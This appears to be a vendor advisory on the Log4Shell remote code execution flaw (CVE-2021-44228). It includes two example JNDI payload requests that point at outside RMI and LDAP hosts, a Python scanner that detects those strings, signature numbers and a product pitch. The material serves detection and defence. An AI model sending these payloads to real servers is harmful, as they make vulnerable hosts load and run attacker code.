Log4Shell Remote Code Execution (CVE-2021-44228)


Application Details

Log4j is an open source Apache logging framework that developers use to keep a record of activity within an application.


Vulnerability

An attacker can send a crafted string that is eventually logged by Log4j version 2.0 or higher. The exploit lets the attacker load arbitrary Java code on the server, allowing them to take control of it.

The vulnerability affects services such as Amazon, Twitter, Apple iCloud and Cloudflare, as well as Minecraft and many others.


Identification

Exploit PoCs have been published showing HTTP requests using the URL or the User-Agent field, but absolutely any input field that is controlled by an attacker and passed to the log4j library can lead to remote code execution.


Here are just a couple of example requests:

User-Agent: ${jndi:rmi://10.10.10.10:1099/djf6hl}
GET /$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D HTTP/1.1
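As an added illustration of the point above (not part of the original advisory or of Idappcom's signatures), the following Python scanner percent-decodes the request line and each header and flags any JNDI lookup, reporting the field it was found in, the scheme and the target host; the sample requests are constructed from the two examples shown and the list of schemes matched is an assumption.

```python
import re
from urllib.parse import unquote

# Matches a JNDI lookup such as ${jndi:ldap://host:1389/Exploit} once decoded.
# Any scheme is accepted; the page shows rmi and ldap.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<target>[^/\s}]+)",
    re.IGNORECASE,
)

def normalize(value: str) -> str:
    """Percent-decode repeatedly so ${jndi:...} sent as $%7Bjndi:...%7D is caught."""
    prev = None
    for _ in range(3):              # bounded: stop after a few rounds
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value

def scan_request(raw: str) -> list:
    """Return one finding per request-line or header carrying a JNDI lookup.

    raw is the request head as text (request line plus headers, CRLF or LF).
    """
    findings = []
    lines = raw.replace("\r\n", "\n").split("\n")
    for idx, line in enumerate(lines):
        if not line.strip():
            break                   # blank line ends the headers
        if idx == 0:
            field, value = "request-line", line
        elif ":" in line:
            field, value = line.split(":", 1)
        else:
            continue
        m = JNDI_RE.search(normalize(value))
        if m:
            findings.append({"field": field.strip(),
                             "scheme": m["scheme"].lower(),
                             "target": m["target"]})
    return findings

# Constructed sample requests built from the two examples above (not real captures).
SAMPLES = [
    "GET /$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\nUser-Agent: ${jndi:rmi://10.10.10.10:1099/djf6hl}\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_request(sample))
```

The same check can be applied to any other attacker-controlled field that reaches the logger, since the lookup string is the indicator regardless of where it is placed.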

Detection

By creating a number of traffic files and corresponding rules, we are able to detect attempts to perform remote code execution against an affected system.


Coverage

Idappcom have created signatures 8022160-8022163 and 8022175 for this vulnerability.

UPDATE: Due to the severity and ongoing threat of this exploit we have also created signatures 8022176-8022180.

References

CVE-2021-44228

Lunasec Blog


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional